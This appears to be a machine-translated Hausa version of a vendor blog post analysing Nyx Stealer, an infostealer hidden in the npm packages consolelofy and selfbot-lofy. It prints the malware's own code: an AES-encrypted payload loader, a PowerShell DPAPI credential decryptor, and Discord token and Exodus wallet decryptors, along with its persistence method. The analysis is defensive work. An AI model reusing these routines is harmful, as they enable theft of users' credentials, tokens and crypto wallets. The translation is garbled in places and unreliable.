npm Infostealer

Sabon Ganowar Npm Infostealer: Nyx ​​Stealer Ya Sace Zaman Discord

TL, DR

Ƙungiyar Binciken Tsaro ta Xygeni gano wani kamfen na npm infostealer mai inganci wanda aka samar ta hanyar fakiti biyu masu cutarwa: consolelofy da kuma selfbot-lofy.

Sabon sigar (consolelofy@1.3.0) yana saka nauyin biyan kuɗi mai 216KB AES wanda ke warwarewa a lokacin aiki kuma yana aiki ta hanyar vm.runInNewContext()Saboda an ɓoye cikakkiyar hanyar amfani da miyagun dabaru, na'urorin daukar hoto masu tsauri waɗanda suka dogara da duba igiyoyi ba za su iya lura da halayensu ba har sai lokacin aiwatarwa.

Da zarar an fayyace, nauyin da aka ɗauka, an yi masa alama a ciki Mai satar Nyx, hari:

  • Alamun tantancewar Discord
  • Shagunan shaidar masu bincike sama da 50
  • Fadada walat ɗin cryptocurrency sama da 90
  • Zaman Roblox, Instagram, Spotify, Steam, Telegram, da TikTok
  • Dagewar abokin ciniki na tebur na Discord

An ruwaito dukkan nau'ikan 20 a cikin fakitin biyu kuma an tabbatar da cewa suna da lahani.

Bayani na Fasaha na Wannan npm Infostealer

Ba kamar malware na lokacin shigarwa na gargajiya ba, wannan kamfen ya dogara ne akan lokacin gudu samfurin ɓoye bayanai.

Akwai:

  • Babu mugunta preinstall or postinstall hooks
  • Babu bayyanannen kiran cibiyar sadarwa lokacin shigarwa
  • Babu dabarar tattara takardar shaidar rubutu mara rubutu

Nauyin yana aiki ne idan aka shigo da kayan aikin. Duk jikin mai cutarwa yana ɓoye kuma yana bayyana ne kawai a cikin ƙwaƙwalwar ajiya a lokacin aiki.

Wannan ƙirar musamman tana guje wa ganowa yayin shigar da fakiti.

Yadda Wannan npm Infostealer Ke Aiwatarwa Da Gaske

Kafin mu yi nazarin abin da Nyx Stealer ya sata, muna buƙatar mu fahimta. yadda yake aiki.

Dabaru na mugunta da ke cikin wannan npm infostealer suna bin tsari mai daidaito:

Ƙaramin na'urar ɗaukar kaya tana warware babban nauyin da aka ɓoye kuma tana aiwatar da shi cikin yanayin VM na Node.js.

Wannan ƙirar an yi ta ne da gangan. Maharin ba ya ɓoye ayyuka a bayan ɓoyewa kawai, suna ɓoyewa ne kawai. cire lambar mugunta daga ganuwa mara motsi gaba ɗaya.

Tsarin Aiwatarwa Mai Babban Mataki

A babban mataki, na'urar rufewa tana yin abubuwa huɗu:

  • Yana samo maɓalli na AES daga kalmar sirri mai lamba ta amfani da SHA-256
  • Yana ɓoye babban rubutun sirri mai lambar hex ta amfani da AES-256-CBC
  • Yana aiwatar da JavaScript ɗin da aka ɓoye ta amfani da vm.runInNewContext()
  • Yana samar da sandbox wanda har yanzu yana nuna manyan abubuwan da suka faru a lokacin aiki

Takaitaccen Bayani Kan Dabaru na Musamman

bangaren Saita / Darajar
algorithm Saukewa: AES-256-CBC
Mabuɗin Samowa SHA-256(kalmar sirri)
Tsarin Farawa (IV) byte 16 na 0x00
kisa vm.runInSabonMa'ana(an cire ɓoye, akwatin sandbox)

Abin mamaki, akwatin yashi yana wucewa ta:

  • require
  • process
  • Buffer
  • masu lokaci
  • fitarwa na module

Wannan yana nufin nauyin da aka cire wanda aka cire yana riƙe da cikakken ikon yin:

  • Tsarin haihuwa
  • Karanta da rubuta fayiloli
  • Yi kiran hanyar sadarwa
  • Gyara aikace-aikacen gida

Wannan ba VM mai iyaka ba ne. VM ne da ake amfani da shi azaman trampoline na aiwatarwa.

Tsarin Ɓoyewa na Lokacin Aiki (Tsarin Aiwatarwa na Musamman)

Na'urar ɗaukar kaya ƙarama ce.
Jikin da ba shi da kyau ba shi da kyau.

Ga tsarin aiwatarwa da aka samu a cikin kunshin:

const crypto = require('crypto'); const vm = require('vm');  function decryptAndExecute(encryptedHex, passphrase) {     const key = crypto.createHash('sha256')                       .update(passphrase)                       .digest();      const iv = Buffer.alloc(16, 0);      const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);     let decrypted = decipher.update(encryptedHex, 'hex', 'utf8');     decrypted += decipher.final('utf8');      const sandbox = {         require,         module,         exports,         console,         process,         Buffer,         __dirname,         __filename,         setTimeout,         setInterval,         clearTimeout,         clearInterval     };      vm.runInNewContext(decrypted, sandbox); }

Dalilin da ya sa wannan Matattarar ke

Nauyin da aka ɓoye:

  • Shin ba akwai a cikin rubutu mara rubutu a cikin kunshin npm
  • Ba a iya gani ga sauƙi ba grep ko kuma na'urar daukar hoto ta kirtani mai motsi
  • Yana bayyana ne kawai a cikin ƙwaƙwalwar ajiya a lokacin aiki
  • Yana aiki tare da cikakken damar lokacin gudu na Node

Wannan haɗin aiwatar da AES + VM alama ce mai ƙarfi ta halayya ta npm infostealer yana ƙoƙarin guje wa binciken da ba ya canzawa.

A takaice dai:

Idan ka duba bishiyar tushen kunshin, ba za ka ga mai satar ba.
Za ka ga na'urar warware bayanai.

Abin da ke Faruwa Bayan Fahimtar Bayanai

Da zarar an aiwatar da shi, Nyx Stealer yana ƙaddamar da raƙuman tattara bayanai a layi ɗaya.

Wave 1: Cire Takardun Shaida na Mai Binciken

Malware:

  • Sauke lokacin Python daga NuGet CDN
  • Yana shigar da ɗakunan karatu na ɓoye sirri
  • Cire shagunan takardun shaida na tushen Chromium
  • Yana ɓoye sirrin da DPAPI ta kare

Maimakon tattara haɗin asali, yana amfani da PowerShell don kiran Windows DPAPI kai tsaye.

function dpapiUnprotectWithPowerShell(dataBuf) {     const b64 = dataBuf.toString('base64');      const ps =         "Add-Type -AssemblyName System.Security;" +         "$b=[Convert]::FromBase64String('" + b64 + "');" +         "$p=[System.Security.Cryptography.ProtectedData]::Unprotect(" +         "$b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);" +         "[Console]::Out.Write([Convert]::ToBase64String($p))";      const cmd =         `powershell -NoProfile -ExecutionPolicy Bypass -Command "${ps}"`;      return Buffer.from(execSync(cmd, { encoding: 'utf8' }).trim(), 'base64'); }

Wannan hanyar:

  • Yana guje wa tarin kayan tarihi
  • Yana amfani da APIs na asali na Windows crypto
  • Haɗuwa cikin kayan aikin gudanarwa

Fahimtar takardar shaidar matakin OS ne, ba gogewa ba.

Wave 2: Fahimtar Alamar Discord

Mai satar yana da masaniya game da ka'idoji. Ya fahimci tsarin alamar Discord da aka ɓoye.

function decryptToken(encryptedToken, key) {     const tokenParts = encryptedToken.split('dQw4w9WgXcQ:');     const encryptedData = Buffer.from(tokenParts[1], 'base64');      const iv = encryptedData.slice(3, 15);     const ciphertext = encryptedData.slice(15, -16);     const tag = encryptedData.slice(-16);      const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);     decipher.setAuthTag(tag);      return decipher.update(ciphertext).toString('utf8'); }

Gudun aiki:

  • Cire maɓallin master daga Discord's Local State
  • Buɗe maɓallin maɓalli ta hanyar amfani da DPAPI
  • Buɗe alamar AES-GCM blobs
  • Tabbatar da alamun akan Discord API
  • Ƙara wadatarwa da Nitro, lambobi, da bayanan lissafin kuɗi

Wannan ba wai yin watsi da takardun shaida ba ne na gama gari. Ana yin satar bayanai ne ta hanyar amfani da yarjejeniya.

Wave 3: Manufar Wallet ɗin Cryptocurrency

NPM infostealer ya lissafa:

  • Faɗin walat ɗin mai bincike sama da 90
  • Wallets na tebur guda 27
  • Hanyoyi na walat mai sanyi
  • Fayilolin zuriyar Fitowa

Misalin ƙoƙarin ɓoye iri:

function decryptSeco(content, password) {     const key = crypto.pbkdf2Sync(password, 'exodus', 10000, 32, 'sha512');      const decipher = crypto.createDecipheriv(         'aes-256-gcm',         key,         content.slice(0, 12)     );      decipher.setAuthTag(content.slice(-16));      return Buffer.concat([         decipher.update(content.slice(12, -16)),         decipher.final()     ]).toString('utf8'); }

Idan aka yi nasara, sulhun walat zai kasance nan take kuma ba za a iya gyara shi ba.

Wannan yana wakiltar mafi girman ƙimar samun kuɗi na kamfen ɗin.

Juriya ta hanyar Allurar Discord Desktop

Bayan tattara takardun shaidar, Nyx Stealer ya yi ƙoƙarin dagewa ta hanyar gyara takardun shaidar da aka yi amfani da su a cikin gida. Zama abokin ciniki.

Target:

%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core\index.js

Jerin Ayyuka

Mai satar bayanai yana yin waɗannan matakai:

  • Yana dakatar da gudanar da ayyukan Discord
  • Nemo nau'ikan Discord da aka shigar (Stable, Canary, PTB)
  • Yana sake rubutawa discord_desktop_core/index.js
  • Yana allurar dabarun webhook mai sarrafa maharin
  • Yana sake kunna Discord

Wannan yana tabbatar da cewa zaman Discord na gaba zai fitar da sabbin alamun tabbatarwa ta atomatik.

Abu mafi mahimmanci, wannan juriyar ba ta dogara ne akan ayyukan da aka tsara ko gyare-gyaren rajista ba. Yana amfani da gyaran lambar matakin aikace-aikace, wata hanya ce ta ɓoye.

Ko da an cire kunshin npm mai cutarwa daga baya, abokin ciniki na Discord zai ci gaba da fuskantar matsala.

Kwatanta Fasaha: Halatta Selfbot vs npm Infostealer

bangaren Laburare Mai Inganci Nyx npm Infostealer
boye-boye Babu Cikakken nauyin da aka ɓoye na AES
Lokacin Aiki VM ba ake bukata vm.runInNewContext kisa
Samun Takaddun shaida API ɗin Discord kawai Mai bincike, walat, DPAPI
Zazzagewa na Waje A'a Lokacin aiki na Python ta hanyar NuGet
dagewa A'a Allurar abokin ciniki ta Discord
monetization Tsarin aiki da Bot Sake sayar da takardun shaida

Tsarin ɓoye sirrin kaɗai ya riga ya raba wannan kamfen ɗin da cokali mai buɗaɗɗen tushe na yau da kullun.

Bot ɗin Discord mai inganci ba shi da wani dalili na ɓoye dukkan tushen lambarsa, ƙirƙirar PowerShell don samun damar DPAPI, saukar da lokutan gudu na waje, ko gyara abubuwan ciki na aikace-aikacen tebur. Lokacin da waɗannan damar suka bayyana a cikin dogaro wanda ke da'awar sarrafa hulɗar Discord ta atomatik, rashin daidaiton gine-gine zai zama ba zai yiwu a yi watsi da shi ba.

Daga mahangar bincike, wannan npm infostealer yana barin alamomi a cikin layuka da yawa. Duk da haka, mafi kyawun alamun ba URLs masu lamba ko takamaiman hanyoyin fayil bane, tunda waɗannan na iya canzawa tsakanin sigogi. Madadin haka, siginar da ke da ɗorewa tsari ne.

A matakin fakitin, tutar ja mafi ƙarfi ita ce haɗuwa da babban nauyin da aka ɓoye da kuma na'urar ɓoye bayanai ta lokacin aiki wadda ke aiki nan take ta hanyar vm.runInNewContext()Duk da cewa ɓoyewa kaɗai ba abu ne mai cutarwa ba, amfani da ɓoye AES sannan aiwatar da VM mai ƙarfi a cikin fakitin amfani da Discord abu ne mai ban mamaki.

A matakin mai masaukin baki, alamu masu zargi sun haɗa da aikin ɓoye bayanai na DPAPI da ba a zata ba, aiwatarwa daga mahallin dogaro da Node.js, da kuma gyara fayilolin aikace-aikacen gida waɗanda bai kamata a taɓa canza su ta hanyar ɗakunan karatu na ɓangare na uku ba. Haka kuma, a matakin cibiyar sadarwa, sadarwa mai kama da webhook da aka fara ta hanyar dogaro da ci gaba tana wakiltar wani yanayi mai ma'ana.

A wata ma'anar, saman ganowa ba shine kawai alamar sulhu ba. Alaƙar ɓoye bayanai, aiwatar da lokacin aiki, samun damar shiga takardun shaida, da kuma ɗabi'ar juriya ce ke bayyana barazanar.

Ganowa da Ragewa tare da Xygeni

npm Infostealer

An gano wannan na'urar npm infostealer ta hanyar Gargaɗin Farko na Malware na Xygeni (MEW) ta hanyar haɗin kai mai layi maimakon daidaitawar sa hannu mai sauƙi.

Maimakon neman wasu nau'ikan igiyoyi marasa kyau da aka sani, MEW tana kimanta rashin daidaituwar tsarin a cikin cikakken tushen bishiyar. A wannan yanayin, ganowa ya fito ne daga haɗuwar sigina da yawa: tsarin ɓoye AES da aka saka a cikin wurin shigar da module, aiwatarwa nan take a cikin mahallin VM, da kuma rashin daidaituwar iyawa zuwa ga niyya bayyananne.

Abu mai mahimmanci, babu ɗaya daga cikin waɗannan sigina da ke nuna mummunan nufi. Duk da haka, idan aka yi nazari tare, suna fallasa yunƙurin ɓoye halayen lokacin aiki. Wannan hanyar da aka tsara ta rage tasirin ƙarya sosai yayin da ake gano barazanar sarkar samar da kayayyaki masu ƙarfi.

Bugu da ƙari, wannan shari'ar ta nuna dalilin da yasa duba lokacin shigarwa kaɗai bai isa ba. Dabaru na mugunta ba ya cikin rubutun zagayowar rayuwa. Yana aiki ne kawai bayan an ɗora kayan aikin kuma yana bayyana ne kawai da zarar an cire shi a cikin ƙwaƙwalwa. Saboda haka, ingantaccen kariya yana buƙatar nazarin ɓoye bayanai, gane yanayin ɗabi'a, da kuma ci gaba da sa ido kan dogaro bayan abubuwan shigarwa.

Cire rajista yana da tasiri. Binciken sanin lokacin aiki yana hana faruwa.

Me yasa wannan npm Infostealer yake da mahimmanci

Nyx Stealer yana wakiltar juyin halittar tsarin malware na tushen npm.

A tarihi, yawancin fakitin ɓarna suna dogara ne akan rubutun lokacin shigarwa ko kuma ƙarshen bayanan tantancewa. Sabanin haka, wannan kamfen ɗin yana ɓoye nauyinsa, yana jinkirta aiwatarwa zuwa lokacin aiki, yana amfani da APIs na tsarin aiki na gaskiya, kuma yana tabbatar da dorewa a cikin aikace-aikacen da aka amince da su.

Saboda haka, maharin ba ya buƙatar amfani da kayayyakin more rayuwa na npm da kansa. Madadin haka, harin yana cin nasara saboda shigar da dogaro yana nufin amincewa. Masu haɓakawa suna ɗauka cewa shigo da ɗakin karatu aiki ne mai aminci, musamman lokacin da ya gabatar da kansa a matsayin kayan aiki mai yuwuwa.

Yayin da yanayin halittu ke ci gaba da girma da kuma yawan amfani da iska, wannan iyaka ta aminci ta zama wani wuri mai jan hankali na kai hari. Saboda haka, kare kai daga masu satar bayanai na npm na zamani yana buƙatar gane tsarin gine-gine maimakon neman igiyoyi marasa motsi.

A ƙarshe, wannan kamfen ɗin yana ƙarfafa wani muhimmin darasi a cikin software supply chain security: barazanar da ta fi haɗari ba ta kasance wadda take kama da mugunta ba a kallon farko, amma wadda ta bayyana a matsayin halaltacciyar tsari har sai lokacin aiki ya bayyana ainihin halayensu.

kayan aikin nazarin kayan aikin sca-tools-composition
Fifiko, gyara, da kuma kare haɗarin software ɗinka
Sami Asusunka Kyauta.
Babu katin bashi da ake bukata.

Tabbatar da Haɓaka Software da Isarwarka

tare da Xygeni Product Suite